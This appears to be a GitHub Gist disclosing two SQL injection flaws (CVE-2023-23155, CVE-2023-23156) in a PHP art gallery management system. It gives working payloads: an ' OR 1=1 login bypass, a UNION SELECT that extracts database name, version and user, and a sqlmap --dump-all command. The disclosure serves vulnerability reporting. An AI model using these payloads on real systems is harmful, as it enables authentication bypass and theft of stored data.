Created
February 9, 2023 14:47
-
-
Save y0gesh-verma/3de9b3e3f0d2b63c07e6704e232d9620 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Art Gallery Management System Project v1.0 - SQL Injection Vulnerability | |
| ## Multiple SQL Injection Vulnerability found in Art Gallery Management System Project 1.0 version. | |
| **Description:-** | |
| > Art Gallery Management System Project in PHP 1.0 was discovered to contain a SQL injection vulnerability via the username parameter in the Admin Login. | |
| **Step to Reproduce :-** | |
| > 1. navigate to Admin Login Panel URL: http://127.0.0.1/Art-Gallery-MS-PHP/admin/login.php | |
| > 2. Now insert the payload in the username field and any string in the password field to bypass login. Payload : ' OR 1=1 -- - | |
| > username: ' OR 1=1 -- - | |
| > password: password | |
| **Reference: CVE-2023-23155** | |
| **Description:-** | |
| > Art Gallery Management System Project in PHP 1.0 was discovered to contain a SQL injection vulnerability via the pid parameter in the single-product page. | |
| **Step to Reproduce :-** | |
| > 1. Go to the Sculptures by navigating the "ART TYPE" option in the navigation bar. | |
| > URL: http://127.0.0.1/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures | |
| > | |
| > 2. Now click on the view details of any product. | |
| > URL: http://127.0.0.1/Art-Gallery-MS-PHP/single-product.php?pid=4 | |
| > | |
| > 3. Here on the "single-product" page in the "pid" parameter by inserting single quotes to break the query and by inserting once again single quotes the query is merged here we know that the "pid" parameter is vulnerable to SQL injection. | |
| > URL: http://127.0.0.1/Art-Gallery-MS-PHP/single-product.php?pid=4' | |
| > URL: http://127.0.0.1/Art-Gallery-MS-PHP/single-product.php?pid=4'' | |
| > | |
| > 4. Now By inserting the payload in the "pid" parameter we get the username, database, and database version. | |
| > Payload: 'UNION SELECT 1, 2, 3, 4, 5, 6, 7, database(), version(), user(), 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22' | |
| > URL: http://127.0.0.1/Art-Gallery-MS-PHP/single-product.php?pid=4'UNION SELECT 1, 2, 3, 4, 5, 6, 7, database(), version(), user(), 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22' | |
| > | |
| > 5. Now dump all the database by using sqlmap: | |
| > python sqlmap.py -u http://127.0.0.1/Art-Gallery-MS-PHP/single-product.php?pid=4 --dump-all --batch | |
| > It takes some time to dump all data. | |
| **Reference: CVE-2023-23156** |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment